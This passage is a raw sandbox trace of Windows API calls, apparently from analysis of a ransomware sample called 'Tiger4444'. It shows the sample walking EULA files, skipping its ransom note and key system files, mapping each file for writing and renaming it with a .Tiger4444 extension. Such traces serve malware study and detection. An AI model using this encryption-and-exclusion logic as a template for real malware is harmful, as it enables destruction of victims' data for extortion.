HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0043.420] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13487322115) returned 1 [0043.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0043.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0043.420] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.421] CloseHandle (hObject=0x2c8) returned 1 [0043.421] CloseHandle (hObject=0x260) returned 1 [0043.425] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm.Tiger4444") returned 62 [0043.425] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.425] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=69824 | out: Addend=0xc6f980) returned 10568224 [0043.425] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=25 | out: Addend=0xc6f98c) returned 3548 [0043.426] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dd45a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dd45a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xf67d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_et-ee.htm", cAlternateFileName="EU56AC~1.HTM")) returned 1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="Tiger4444.exe") returned -1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2=".") returned 1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="..") returned 1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="windows") returned -1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="bootmgr") returned 1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="pagefile.sys") returned -1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="boot") returned 1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="ids.txt") returned -1 [0043.426] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="NTUSER.DAT") returned -1 [0043.426] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_et-ee.htm" | out: lpString1="EULA_et-ee.htm") returned="EULA_et-ee.htm" [0043.426] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm", dwFileAttributes=0x0) returned 1 [0043.426] lstrlenW (lpString="EULA_et-ee.htm") returned 14 [0043.426] lstrlenW (lpString="Tiger4444") returned 9 [0043.426] lstrcmpiW (lpString1="et-ee.htm", lpString2="Tiger4444") returned -1 [0043.426] lstrlenW (lpString=".dll") returned 4 [0043.426] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.426] lstrlenW (lpString=".lnk") returned 4 [0043.426] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.426] lstrlenW (lpString=".ini") returned 4 [0043.426] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.426] lstrlenW (lpString=".sys") returned 4 [0043.426] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.426] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.427] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.427] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13487971847) returned 1 [0043.427] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=63101) returned 1 [0043.427] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0043.427] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0043.427] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf980, lpName=0x0) returned 0x2c8 [0043.428] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf980) returned 0xbe0000 [0043.440] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.440] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0043.440] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.440] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0043.440] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.440] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0043.440] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.441] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0043.441] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13489365776) returned 1 [0043.441] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0043.441] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0043.441] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.441] CloseHandle (hObject=0x2c8) returned 1 [0043.441] CloseHandle (hObject=0x260) returned 1 [0043.444] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm.Tiger4444") returned 62 [0043.444] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.444] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=63104 | out: Addend=0xc6f980) returned 10638048 [0043.444] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=13 | out: Addend=0xc6f98c) returned 3573 [0043.444] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dfb2b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dfb2b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1145a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_fi-fi.htm", cAlternateFileName="EULA_F~1.HTM")) returned 1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="Tiger4444.exe") returned -1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2=".") returned 1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="..") returned 1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="windows") returned -1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="bootmgr") returned 1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="pagefile.sys") returned -1 [0043.444] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="boot") returned 1 [0043.445] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="ids.txt") returned -1 [0043.445] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="NTUSER.DAT") returned -1 [0043.445] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_fi-fi.htm" | out: lpString1="EULA_fi-fi.htm") returned="EULA_fi-fi.htm" [0043.445] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm", dwFileAttributes=0x0) returned 1 [0043.446] lstrlenW (lpString="EULA_fi-fi.htm") returned 14 [0043.446] lstrlenW (lpString="Tiger4444") returned 9 [0043.446] lstrcmpiW (lpString1="fi-fi.htm", lpString2="Tiger4444") returned -1 [0043.446] lstrlenW (lpString=".dll") returned 4 [0043.446] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.446] lstrlenW (lpString=".lnk") returned 4 [0043.446] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.446] lstrlenW (lpString=".ini") returned 4 [0043.446] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.446] lstrlenW (lpString=".sys") returned 4 [0043.446] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.446] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.446] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.446] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13489926165) returned 1 [0043.446] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70746) returned 1 [0043.446] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0043.446] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0043.446] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11760, lpName=0x0) returned 0x2c8 [0043.447] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11760) returned 0xbe0000 [0043.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0043.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0043.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0043.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0043.452] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13490545711) returned 1 [0043.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0043.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0043.452] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.453] CloseHandle (hObject=0x2c8) returned 1 [0043.453] CloseHandle (hObject=0x260) returned 1 [0043.458] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm.Tiger4444") returned 62 [0043.458] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.459] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=70752 | out: Addend=0xc6f980) returned 10701152 [0043.459] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=6 | out: Addend=0xc6f98c) returned 3586 [0043.459] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e0ee6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e0ee6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10f0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_fr-ca.htm", cAlternateFileName="EULA_F~2.HTM")) returned 1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="Tiger4444.exe") returned -1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2=".") returned 1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="..") returned 1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="windows") returned -1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="bootmgr") returned 1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="pagefile.sys") returned -1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="boot") returned 1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="ids.txt") returned -1 [0043.459] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="NTUSER.DAT") returned -1 [0043.459] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_fr-ca.htm" | out: lpString1="EULA_fr-ca.htm") returned="EULA_fr-ca.htm" [0043.459] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm", dwFileAttributes=0x0) returned 1 [0043.460] lstrlenW (lpString="EULA_fr-ca.htm") returned 14 [0043.460] lstrlenW (lpString="Tiger4444") returned 9 [0043.460] lstrcmpiW (lpString1="fr-ca.htm", lpString2="Tiger4444") returned -1 [0043.460] lstrlenW (lpString=".dll") returned 4 [0043.460] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.460] lstrlenW (lpString=".lnk") returned 4 [0043.460] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.460] lstrlenW (lpString=".ini") returned 4 [0043.460] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.460] lstrlenW (lpString=".sys") returned 4 [0043.460] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.460] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.460] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.460] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13491329594) returned 1 [0043.460] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=69386) returned 1 [0043.460] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0043.460] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0043.460] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11210, lpName=0x0) returned 0x2c8 [0043.461] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11210) returned 0xbe0000 [0043.502] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.502] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0043.502] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.502] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0043.502] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.502] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0043.502] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.502] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0043.502] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13495506326) returned 1 [0043.502] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0043.502] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0043.502] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.503] CloseHandle (hObject=0x2c8) returned 1 [0043.503] CloseHandle (hObject=0x260) returned 1 [0043.505] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm.Tiger4444") returned 62 [0043.505] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.506] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=69392 | out: Addend=0xc6f980) returned 10771904 [0043.506] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=41 | out: Addend=0xc6f98c) returned 3592 [0043.506] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e2266, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e2266, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10f0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_fr-fr.htm", cAlternateFileName="EULA_F~3.HTM")) returned 1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="Tiger4444.exe") returned -1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2=".") returned 1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="..") returned 1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="windows") returned -1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="bootmgr") returned 1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="pagefile.sys") returned -1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="boot") returned 1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="ids.txt") returned -1 [0043.506] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="NTUSER.DAT") returned -1 [0043.507] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_fr-fr.htm" | out: lpString1="EULA_fr-fr.htm") returned="EULA_fr-fr.htm" [0043.507] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm", dwFileAttributes=0x0) returned 1 [0043.507] lstrlenW (lpString="EULA_fr-fr.htm") returned 14 [0043.507] lstrlenW (lpString="Tiger4444") returned 9 [0043.507] lstrcmpiW (lpString1="fr-fr.htm", lpString2="Tiger4444") returned -1 [0043.507] lstrlenW (lpString=".dll") returned 4 [0043.507] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.507] lstrlenW (lpString=".lnk") returned 4 [0043.507] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.507] lstrlenW (lpString=".ini") returned 4 [0043.507] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.507] lstrlenW (lpString=".sys") returned 4 [0043.507] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.507] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.507] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.507] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13496043309) returned 1 [0043.507] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=69386) returned 1 [0043.507] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0043.507] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0043.507] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11210, lpName=0x0) returned 0x2c8 [0043.508] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11210) returned 0xbe0000 [0043.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0043.512] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0043.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.512] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0043.512] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.513] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0043.513] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13496569052) returned 1 [0043.513] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0043.513] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0043.513] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.513] CloseHandle (hObject=0x2c8) returned 1 [0043.513] CloseHandle (hObject=0x260) returned 1 [0043.516] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm.Tiger4444") returned 62 [0043.516] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.519] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=69392 | out: Addend=0xc6f980) returned 10841296 [0043.519] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 3633 [0043.519] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e35dd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e35dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xd3187, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_he-il.htm", cAlternateFileName="EULA_H~1.HTM")) returned 1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="Tiger4444.exe") returned -1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2=".") returned 1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="..") returned 1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="windows") returned -1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="bootmgr") returned 1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="pagefile.sys") returned -1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", 